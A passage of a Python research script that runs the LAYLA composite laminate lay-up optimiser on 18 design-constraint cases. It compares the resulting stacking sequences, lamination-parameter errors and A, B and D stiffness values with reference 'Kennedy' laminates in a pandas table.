-0.029, 0,\r\n 0.0299, -0.8037, -0.0598, 0]),\r\n np.array([-0.1519, -0.0621, 0, 0,\r\n 0, 0, 0, 0,\r\n 0.0437, -0.79, -0.0233, 0]),\r\n np.array([-0.1196, -0.0585, 0, 0,\r\n 0, 0, 0, 0,\r\n 0.0483, -0.721, -0.0196, 0])\r\n ]\r\n\r\nssK = [\r\n np.array([-45, -45, 45, -45, 45, 45, 0, 0, 45, 90, 90, 90, 90, 45, 90, 90, 90, 90, 90, 0, -45, 0, -45, 45, -45, -45, 45, 45], int),\r\n np.array([45, -45, 45, -45, -45, 45, -45, 0, 0, 90, 90, 90, 90, 90, 90, 90, 90, 90, 90, 0, 0, -45, 45, -45, -45, 45, -45, 45], int),\r\n np.array([45, -45, -45, 45, -45, 45, 0, -45, 45, 90, 90, 0, 90, 90, 90, 90, 0, 90, 90, 45, -45, 0, 45, -45, 45, -45, -45, 45 ], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n\r\n np.array([45, -45, -45, -45, 45, 45, 45, 0, 0, -45, 90, 45, 90, 90, 90, 90, 45, 90, -45, 0, 0, 45, 45, 45, -45, -45, -45, 45], int),\r\n np.array([45, -45, -45, -45, 45, 45, 45, 0, 0, -45, 90, 45, 90, 90, 90, 90, 45, 90, -45, 0, 0, 45, 45, 45, -45, -45, -45, 45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, 45, 90, -45, 90, -45, 0, 0, -45, 90, -45, 90, 45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 45, 0, -45, 90, 90, 90, -45, 0, 45, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, 45, 45, -45, 45, -45, 0, -45, 0, 45, 90, 90, 90, 90, 90, 90, 90, 0, 0, 90, 45, 45, -45, 45, -45, -45, -45, 45], int),\r\n\r\n np.array([-45, 45, -45, 45, 45, -45, 0, 45, -45, 90, 0, 90, 90, 90, 90, 90, 90, 0, 90, -45, 45, 0, -45, 45, 45, -45, 45, -45], int),\r\n np.array([-45, 45, -45, 45, 45, -45, 0, 45, -45, 90, 90, 0, 90, 90, 90, 90, 0, 90, 90, -45, 45, 0, -45, 45, 45, -45, 45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([45, -45, -45, 45, 45, -45, 0, -45, 0, 90, 90, 90, 90, 45, 45, 90, 90, 90, 90, 0, -45, 0, -45, 45, 45, -45, -45, 45], int),\r\n\r\n np.array([45, -45, -45, 45, 45, -45, 0, -45, 0, 90, 90, 90, 90, 45, 45, 90, 90, 90, 90, 0, -45, 0, -45, 45, 45, -45, -45, 45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n np.array([-45, -45, 0, 45, 45, 45, 45, 90, -45, 90, 90, 90, -45, 0, 0, 0, -45, 90, 90, 90, -45, 90, 45, 45, 45, 45, 0, -45, -45], int),\r\n ]\r\n\r\nfor i in range(18):\r\n\r\n print('\\n ipop', i)\r\n\r\n comment = comments[i]\r\n time_global_layerwise = timesK[i]\r\n n_plies = ply_counts[i]\r\n lampamK = calc_lampam(ssK[i])\r\n\r\n if i == 0: # 'Normal'\r\n lampam_target = lampam_targets[0]\r\n constraints = Constraints(\r\n sym=False,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 1: # 'Symmetric'\r\n lampam_target = lampam_targets[1]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 2: # 'Sym + contiguity'\r\n lampam_target = lampam_targets[1]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 3 or i == 4: # 'Sym + disorientation'\r\n lampam_target = lampam_targets[1]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=True,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 5: # 'Sym + 10%'\r\n lampam_target = lampam_targets[2]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 6: # 'Sym + 10% + contiguity + damtol'\r\n lampam_target = lampam_targets[2]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=True,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 7 or i == 8: # 'Sym + 10% + contiguity + damtol + disorientation'\r\n lampam_target = lampam_targets[2]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=False,\r\n dam_tol=True,\r\n diso=True,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 9: # 'Balanced'\r\n lampam_target = lampam_targets[3]\r\n constraints = Constraints(\r\n sym=False,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 10: # 'Sym + bal'\r\n lampam_target = lampam_targets[4]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 11: # 'Sym + bal + contiguity'\r\n lampam_target = lampam_targets[4]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 12 or i == 13: # 'Sym + bal + disorientation'\r\n lampam_target = lampam_targets[4]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=True,\r\n contig=False,\r\n rule_10_percent=False,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 14: # 'Sym + bal + 10%'\r\n lampam_target = lampam_targets[5]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n diso=False,\r\n contig=False,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 15: # 'Sym + bal + 10% + contiguity + damtol'\r\n lampam_target = lampam_targets[5]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=True,\r\n diso=False,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n elif i == 16 or i == 17: # 'Sym + bal + 10% + contiguity + damtol + diso'\r\n lampam_target = lampam_targets[5]\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=True,\r\n diso=True,\r\n contig=True,\r\n rule_10_percent=True,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n dam_tol_rule=dam_tol_rule,\r\n set_of_angles=np.array([-45, 0, 45, 90], int))\r\n\r\n targets = Targets(n_plies=ply_counts[i], lampam=lampam_target)\r\n parameters = Parameters(\r\n constraints=constraints,\r\n coeff_10=coeff_10,\r\n coeff_bal_ipo=coeff_bal_ipo,\r\n coeff_oopo=coeff_oopo,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n n_outer_step=n_outer_step,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n first_level_sensitivities=first_level_sensitivities,\r\n lampam_to_be_optimised=lampam_to_be_optimised,\r\n global_node_limit=global_node_limit,\r\n local_node_limit=local_node_limit,\r\n global_node_limit_p=global_node_limit_p,\r\n local_node_limit_final=local_node_limit_final,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n penalty_10_lampam_switch=penalty_10_lampam_switch,\r\n penalty_10_pc_switch=penalty_10_pc_switch,\r\n penalty_ipo_switch=penalty_ipo_switch,\r\n penalty_bal_switch=penalty_bal_switch,\r\n type_obj_func=1)\r\n #print(parameters)\r\n\r\n t = time.time()\r\n result = LAYLA_optimiser(parameters, constraints, targets, mat_prop)\r\n elapsed1 = time.time() - t\r\n\r\n\r\n check_lay_up_rules(result.ss, constraints)\r\n check_lay_up_rules(ssK[i], constraints)\r\n\r\n\r\n print('Time', elapsed1)\r\n print('objective with modified lamination parameter weightings',\r\n result.objective)\r\n\r\n table_result = pd.DataFrame()\r\n\r\n# # number of the outer loop with the best results\r\n# table_result.loc[0, 'best outer loop'] \\\r\n# = result.n_outer_step_best_solution\r\n#\r\n# # Number of iterations\r\n# table_result.loc[0, 'n_outer_step_performed'] \\\r\n# = result.number_of_outer_steps_performed\r\n\r\n table_result.loc[0, 'constraints'] = comments[i]\r\n\r\n # Laminate ply count\r\n table_result.loc[0 + 0, 'Ply count'] = np.NaN\r\n table_result.loc[0 + 1, 'Ply count'] = ssK[i].size\r\n table_result.loc[0 + 2, 'Ply count'] = result.ss.size\r\n\r\n # objective\r\n table_result.loc[\r\n 0 + 0, 'objective with initial lamination parameter weightings'] \\\r\n = np.NaN\r\n table_result.loc[\r\n 0 + 1, 'objective with initial lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=lampamK,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_ini,\r\n constraints=constraints,\r\n parameters=parameters)\r\n table_result.loc[\r\n 0 + 2, 'objective with initial lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=result.lampam,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_ini,\r\n constraints=constraints,\r\n parameters=parameters)\r\n\r\n table_result.loc[\r\n 0 + 0, 'objective with modified lamination parameter weightings'] \\\r\n = np.NaN\r\n table_result.loc[\r\n 0 + 1, 'objective with modified lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=lampamK,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_final,\r\n constraints=constraints,\r\n parameters=parameters)\r\n table_result.loc[\r\n 0 + 2, 'objective with modified lamination parameter weightings'] \\\r\n = result.objective\r\n\r\n# # Inhomogeneity factor\r\n# table_result.loc[0, 'target inhomogeneity factor'] \\\r\n# = np.linalg.norm(lampam_target[0:4] - lampam_target[8:12])\r\n#\r\n# # objectives\r\n# for k in range(parameters.n_outer_step):\r\n# table_result.loc[\r\n# 0, f'objective iteration {k+1}'] = result.obj_tab[k]\r\n\r\n # Computational time in s\r\n table_result.loc[0 + 0, 'time (s)'] = np.NaN\r\n table_result.loc[0 + 1, 'time (s)'] = timesK[i]\r\n table_result.loc[0 + 2, 'time (s)'] = elapsed1\r\n\r\n # lampam_target\r\n table_result.loc[0 + 0, 'information'] = 'lampam_target'\r\n table_result.loc[0 + 0, 'index 1'] = lampam_target[0]\r\n table_result.loc[0 + 0, 'index 2'] = lampam_target[1]\r\n table_result.loc[0 + 0, 'index 3'] = lampam_target[2]\r\n table_result.loc[0 + 0, 'index 4'] = lampam_target[3]\r\n table_result.loc[0 + 0, 'index 5'] = lampam_target[4]\r\n table_result.loc[0 + 0, 'index 6'] = lampam_target[5]\r\n table_result.loc[0 + 0, 'index 7'] = lampam_target[6]\r\n table_result.loc[0 + 0, 'index 8'] = lampam_target[7]\r\n table_result.loc[0 + 0, 'index 9'] = lampam_target[8]\r\n table_result.loc[0 + 0, 'index 10'] = lampam_target[9]\r\n table_result.loc[0 + 0, 'index 11'] = lampam_target[10]\r\n table_result.loc[0 + 0, 'index 12'] = lampam_target[11]\r\n\r\n table_result.loc[0 + 1, 'information'] = 'LP errors Kennedy'\r\n table_result.loc[0 + 1, 'index 1'] \\\r\n = abs(lampam_target[0] - lampamK[0])\r\n table_result.loc[0 + 1, 'index 2'] \\\r\n = abs(lampam_target[1] - lampamK[1])\r\n table_result.loc[0 + 1, 'index 3'] \\\r\n = abs(lampam_target[2] - lampamK[2])\r\n table_result.loc[0 + 1, 'index 4'] \\\r\n = abs(lampam_target[3] - lampamK[3])\r\n table_result.loc[0 + 1, 'index 5'] \\\r\n = abs(lampam_target[4] - lampamK[4])\r\n table_result.loc[0 + 1, 'index 6'] \\\r\n = abs(lampam_target[5] - lampamK[5])\r\n table_result.loc[0 + 1, 'index 7'] \\\r\n = abs(lampam_target[6] - lampamK[6])\r\n table_result.loc[0 + 1, 'index 8'] \\\r\n = abs(lampam_target[7] - lampamK[7])\r\n table_result.loc[0 + 1, 'index 9'] \\\r\n = abs(lampam_target[8] - lampamK[8])\r\n table_result.loc[0 + 1, 'index 10'] \\\r\n = abs(lampam_target[9] - lampamK[9])\r\n table_result.loc[0 + 1, 'index 11'] \\\r\n = abs(lampam_target[10] - lampamK[10])\r\n table_result.loc[0 + 1, 'index 12'] \\\r\n = abs(lampam_target[11] - lampamK[11])\r\n\r\n table_result.loc[0 + 2, 'information'] = 'LP errors LAYLA'\r\n table_result.loc[0 + 2, 'index 1'] \\\r\n = abs(lampam_target[0] - result.lampam[0])\r\n table_result.loc[0 + 2, 'index 2'] \\\r\n = abs(lampam_target[1] - result.lampam[1])\r\n table_result.loc[0 + 2, 'index 3'] \\\r\n = abs(lampam_target[2] - result.lampam[2])\r\n table_result.loc[0 + 2, 'index 4'] \\\r\n = abs(lampam_target[3] - result.lampam[3])\r\n table_result.loc[0 + 2, 'index 5'] \\\r\n = abs(lampam_target[4] - result.lampam[4])\r\n table_result.loc[0 + 2, 'index 6'] \\\r\n = abs(lampam_target[5] - result.lampam[5])\r\n table_result.loc[0 + 2, 'index 7'] \\\r\n = abs(lampam_target[6] - result.lampam[6])\r\n table_result.loc[0 + 2, 'index 8'] \\\r\n = abs(lampam_target[7] - result.lampam[7])\r\n table_result.loc[0 + 2, 'index 9'] \\\r\n = abs(lampam_target[8] - result.lampam[8])\r\n table_result.loc[0 + 2, 'index 10'] \\\r\n = abs(lampam_target[9] - result.lampam[9])\r\n table_result.loc[0 + 2, 'index 11'] \\\r\n = abs(lampam_target[10] - result.lampam[10])\r\n table_result.loc[0 + 2, 'index 12'] \\\r\n = abs(lampam_target[11] - result.lampam[11])\r\n\r\n# # Retrieved stacking sequence at step 1\r\n# ss_flatten = np.array(result.ss_tab[0], dtype=str)\r\n# ss_flatten = ' '.join(ss_flatten)\r\n# table_result.loc[0, 'ss retrieved at step 1'] = ss_flatten\r\n\r\n # Retrieved stacking sequence\r\n table_result.loc[0 + 0, 'stacking sequence'] = np.NaN\r\n ss_flattenK = np.array(ssK[i], dtype=str)\r\n ss_flattenK = ' '.join(ss_flattenK)\r\n table_result.loc[0 + 1, 'stacking sequence'] = ss_flattenK\r\n ss_flatten = np.array(result.ss, dtype=str)\r\n ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[0 + 2, 'stacking sequence'] = ss_flatten\r\n\r\n\r\n# # Target stacking sequence\r\n# table_result.loc[0, 'ss target'] = np.NaN\r\n\r\n# # Ply counts\r\n# table_result.loc[0, 'N0_target'] = np.NaN\r\n# table_result.loc[0, 'N90_target'] = np.NaN\r\n# table_result.loc[0, 'N45_target'] = np.NaN\r\n# table_result.loc[0, 'N-45_target'] = np.NaN\r\n# N0 = sum(result.ss == 0)\r\n# N90 = sum(result.ss == 90)\r\n# N45 = sum(result.ss == 45)\r\n# N135 = sum(result.ss == -45)\r\n# table_result.loc[0, 'N0 - N0_target'] = np.NaN\r\n# table_result.loc[0, 'N90 - N90_target'] = np.NaN\r\n# table_result.loc[0, 'N45 - N45_target'] = np.NaN\r\n# table_result.loc[0, 'N-45 - N-45_target'] = np.NaN\r\n# table_result.loc[0, 'penalty value for the 10% rule'] \\\r\n# = calc_penalty_10_ss(result.ss, constraints)\r\n\r\n# for ind in range(n_outer_step):\r\n# # numbers of stacks at the last level of the last group search\r\n# table_result.loc[0, 'n_designs_last_level ' + str(ind + 1)] \\\r\n# = result.n_designs_last_level_tab[ind]\r\n# # numbers of repaired stacks at the last group search\r\n# table_result.loc[0, 'n_designs_repaired ' + str(ind + 1)] \\\r\n# = result.n_designs_repaired_tab[ind]\r\n# # numbers of unique repaired stacks at the last group search\r\n# table_result.loc[0, 'n_designs_repaired_unique ' + str(ind + 1)] \\\r\n# = result.n_designs_repaired_unique_tab[ind]\r\n\r\n# # in-plane orthotropy\r\n# ipo_now = ipo_param_1_12(result.lampam, mat_prop, constraints.sym)\r\n# table_result.loc[0, 'In-plane orthotropy parameter 1'] = ipo_now[0]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 2'] = ipo_now[1]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 3'] = ipo_now[2]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 4'] = ipo_now[3]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 5'] = ipo_now[4]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 6'] = ipo_now[5]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 7'] = ipo_now[6]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 8'] = ipo_now[7]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 9'] = ipo_now[8]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 10'] = ipo_now[9]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 11'] = ipo_now[10]\r\n# table_result.loc[0, 'In-plane orthotropy parameter 12'] = ipo_now[11]\r\n\r\n AK = A_from_lampam(lampamK, mat_prop)\r\n A11K = AK[0, 0]\r\n A22K = AK[1, 1]\r\n A12K = AK[0, 1]\r\n A66K = AK[2, 2]\r\n A16K = AK[0, 2]\r\n A26K = AK[1, 2]\r\n\r\n BK = B_from_lampam(lampamK, mat_prop)\r\n B11K = BK[0, 0]\r\n B22K = BK[1, 1]\r\n B12K = BK[0, 1]\r\n B66K = BK[2, 2]\r\n B16K = BK[0, 2]\r\n B26K = BK[1, 2]\r\n\r\n DK = D_from_lampam(lampamK, mat_prop)\r\n D11K = DK[0, 0]\r\n D22K = DK[1, 1]\r\n D12K = DK[0, 1]\r\n D66K = DK[2, 2]\r\n D16K = DK[0, 2]\r\n D26K = DK[1, 2]\r\n\r\n A = A_from_lampam(result.lampam, mat_prop)\r\n A11 = A[0, 0]\r\n A22 = A[1, 1]\r\n A12 = A[0, 1]\r\n A66 = A[2, 2]\r\n A16 = A[0, 2]\r\n A26 = A[1, 2]\r\n\r\n B = B_from_lampam(result.lampam, mat_prop)\r\n B11 = B[0, 0]\r\n B22 = B[1, 1]\r\n B12 = B[0, 1]\r\n B66 = B[2, 2]\r\n B16 = B[0, 2]\r\n B26 = B[1, 2]\r\n\r\n D = D_from_lampam(result.lampam, mat_prop)\r\n D11 = D[0, 0]\r\n D22 = D[1, 1]\r\n D12 = D[0, 1]\r\n D66 = D[2, 2]\r\n D16 = D[0, 2]\r\n D26 = D[1, 2]\r\n\r\n A_target = A_from_lampam(lampam_target, mat_prop)\r\n A11_target = A_target[0, 0]\r\n A22_target = A_target[1, 1]\r\n A12_target = A_target[0, 1]\r\n A66_target = A_target[2, 2]\r\n A16_target = A_target[0, 2]\r\n A26_target = A_target[1, 2]\r\n\r\n B_target = B_from_lampam(lampam_target, mat_prop)\r\n B11_target = B_target[0, 0]\r\n B22_target = B_target[1, 1]\r\n B12_target = B_target[0, 1]\r\n B66_target = B_target[2, 2]\r\n B16_target = B_target[0, 2]\r\n B26_target = B_target[1, 2]\r\n\r\n D_target = D_from_lampam(lampam_target, mat_prop)\r\n D11_target = D_target[0, 0]\r\n D22_target = D_target[1, 1]\r\n D12_target = D_target[0, 1]\r\n D66_target = D_target[2, 2]\r\n D16_target = D_target[0, 2]\r\n D26_target = D_target[1, 2]\r\n\r\n table_result.loc[0 + 0, 'stifnesses'] = 'targets'\r\n table_result.loc[0 + 0, 'A11'] = A11_target\r\n table_result.loc[0 + 0, 'A22'] = A22_target\r\n table_result.loc[0 + 0, 'A12'] = A12_target\r\n table_result.loc[0 + 0, 'A66'] = A66_target\r\n table_result.loc[0 + 0, 'A16'] = A16_target\r\n table_result.loc[0 + 0, 'A26'] = A26_target\r\n\r\n table_result.loc[0 + 0, 'B11'] = B11_target\r\n table_result.loc[0 + 0, 'B22'] = B22_target\r\n table_result.loc[0 + 0, 'B12'] = B12_target\r\n table_result.loc[0 + 0, 'B66'] = B66_target\r\n table_result.loc[0 + 0, 'B16'] = B16_target\r\n table_result.loc[0 + 0, 'B26'] = B26_target\r\n\r\n table_result.loc[0 + 0, 'D11'] = D11_target\r\n table_result.loc[0 + 0, 'D22'] = D22_target\r\n table_result.loc[0 + 0, 'D12'] = D12_target\r\n table_result.loc[0 + 0, 'D66'] = D66_target\r\n table_result.loc[0 + 0, 'D16'] = D16_target\r\n table_result.loc[0 + 0, 'D26'] = D26_target\r\n\r\n table_result.loc[0 + 1, 'stifnesses'] = 'Kennedy'\r\n table_result.loc[0 + 1, 'A11'] = A11K\r\n table_result.loc[0 + 1, 'A22'] = A22K\r\n table_result.loc[0 + 1, 'A12'] = A12K\r\n table_result.loc[0 + 1, 'A66'] = A66K\r\n table_result.loc[0 + 1, 'A16'] = A16K\r\n table_result.loc[0 + 1, 'A26'] = A26K\r\n\r\n table_result.loc[0 + 1, 'B11'] = B11K\r\n table_result.loc[0 + 1, 'B22'] = B22K\r\n table_result.loc[0 + 1, 'B12'] = B12K\r\n table_result.loc[0 + 1, 'B66'] = B66K\r\n table_result.loc[0 + 1, 'B16'] = B16K\r\n table_result.loc[0 + 1, 'B26'] = B26K\r\n\r\n table_result.loc[0 + 1, 'D11'] = D11K\r\n table_result.loc[0 + 1, 'D22'] = D22K\r\n table_result.loc[0 + 1, 'D12'] = D12K\r\n table_result.loc[0 + 1, 'D66'] = D66K\r\n table_result.loc[0 + 1, 'D16'] = D16K\r\n table_result.loc[0 + 1, 'D26'] = D26K\r\n\r\n table_result.loc[0 + 2, 'stifnesses'] = 'LAYLA'\r\n table_result.loc[0 + 2, 'A11'] = A11\r\n table_result.loc[0 + 2, 'A22'] = A22\r\n table_result.loc[0 + 2, 'A12'] = A12\r\n table_result.loc[0 + 2, 'A66'] = A66\r\n table_result.loc[0 + 2, 'A16'] = A16\r\n table_result.loc[0 + 2, 'A26'] = A26\r\n\r\n table_result.loc[0 + 2, 'B11'] = B11\r\n table_result.loc[0 + 2, 'B22'] = B22\r\n table_result.loc[0 + 2, 'B12'] = B12\r\n table_result.loc[0 + 2, 'B66'] = B66\r\n table_result.loc[0 + 2, 'B16'] = B16\r\n table_result.loc[0 + 2, 'B26'] = B26\r\n\r\n table_result.loc[0 + 2, 'D11'] = D11\r\n table_result.loc[0 + 2, 'D22'] = D22\r\n table_result.loc[0 + 2, 'D12'] = D12\r\n table_result.loc[0 + 2, 'D66'] = D66\r\n table_result.loc[0 + 2, 'D16'] = D16\r\n table_result.loc[0 + 2, 'D26'] = D26\r\n\r\n# if A11_target:\r\n# table_result.loc[0 + 1, 'diff A11 percentage']\\\r\n# = 100 * abs((A11K - A11_target)/A11_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A11 percentage'] = 0\r\n# if A22_target:\r\n# table_result.loc[0 + 1, 'diff A22 percentage']\\\r\n# = 100 * abs((A22K - A22_target)/A22_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A22 percentage'] = 0\r\n# if A12_target:\r\n# table_result.loc[0 + 1, 'diff A12 percentage']\\\r\n# = 100 * abs((A12K - A12_target)/A12_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A12 percentage'] = 0\r\n# if A66_target:\r\n# table_result.loc[0 + 1, 'diff A66 percentage']\\\r\n# = 100 * abs((A66K - A66_target)/A66_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A66 percentage'] = 0\r\n# if A16_target:\r\n# table_result.loc[0 + 1, 'diff A16 percentage']\\\r\n# = 100 * abs((A16K - A16_target)/A16_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A16 percentage'] = 0\r\n# if A26_target:\r\n# table_result.loc[0 + 1, 'diff A26 percentage']\\\r\n# = 100 * abs((A26K - A26_target)/A26_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff A26 percentage'] = 0\r\n#\r\n# if B11_target:\r\n# table_result.loc[0 + 1, 'diff B11 percentage']\\\r\n# = 100 * abs((B11K - B11_target)/B11_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B11 percentage'] = 0\r\n# if B22_target:\r\n# table_result.loc[0 + 1, 'diff B22 percentage']\\\r\n# = 100 * abs((B22K - B22_target)/B22_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B22 percentage'] = 0\r\n# if B12_target:\r\n# table_result.loc[0 + 1, 'diff B12 